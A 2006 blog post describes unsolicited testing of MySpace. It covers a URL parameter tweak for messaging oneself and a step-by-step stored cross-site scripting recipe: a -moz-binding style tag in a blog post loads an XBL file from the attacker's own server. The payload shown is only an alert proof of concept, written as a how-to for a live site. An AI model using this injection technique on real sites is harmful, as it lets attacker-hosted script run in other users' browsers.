« Web Backdoors
23C3 »

Hacking Session at Myspace.com

Comments Published December 23rd, 2006 in security

Today I get back internet connection at home and for me that was enough to celebrate. So I did a small web hacking session on different websites like ebay, google, myspace and some more. (Un)fortunately my session was very successful and I’ve found some really nasty stuff on those websites. For this time I’d like to talk about my findings I made at myspace.com.

  1. How to write a message to your own account?

    Normally you’re unable to write a private message to your own account. For testing reasons this isn’t very nice because you need to have at least two accounts and then you always have to switch between them. So have a look at the URL you have to go to if you would like to answer a private message you get from another person:

    http://messaging.myspace.com/index.cfm?fuseaction=mail.readmessage&userID=12345678&

    type=inbox&messageID=[theMessageID]&fed=True&MyToken=[yourToken]

    The variable called “userID” is the one which is most interesting for us now because we can change it to every User we’d like to. So the last thing we have to to is that we have to get our own ID. This is very simple, just go to your own profile and get the URL which is liked when you click on “View My: Blog”. In there you’ll find a variable which’s called “friendID”, that’s you own ID. That’s it, now you can send messages to yourselfe :)

    (Of course there are much more ways on how to get your own ID)

  2. Is Myspace.com now XSS protected?

    The answer is: NO! :-D

    I have to say that their protection mechanisms are very good if I compare them with other well known websites. But as we all know, something is not secure if we simply have a better protection then others. So as you can imagine now, I “XSSed” Myspace.com :)

    Here’s my HowTo:

    1. The first step you have to do is preparation. You need webspace somewere, where you can upload a script like the following:

      <bindings>
      <binding id="xss">
      <implementation>
      <constructor>alert('XSS')</constructor>
      </implementation>
      </binding>
      </bindings>

      Now save it on your server and name it somehow like xss.xml

    2. OK now let’s really start with the attack. Go to your Myspace profile and there go to you personal blog. Now click on “Post New Blog” and there first enter an interesting subject. Let’s go now to the “Body” part of your blog entry and enter there the following:

      <STYLE>BODY{-moz-binding:url("http://[yourPreparedServer]/xss.xml#xss")}</STYLE>

      (of course you have to replace the brackets [])

      Now you can try if your XSS was successful by clicking on “Preview & Post”. There should now popup an alert message saying “XSS” :)

No Comments to “Hacking Session at Myspace.com”  

Feed for this Entry Trackback Address
  1. No Comments

Leave a Reply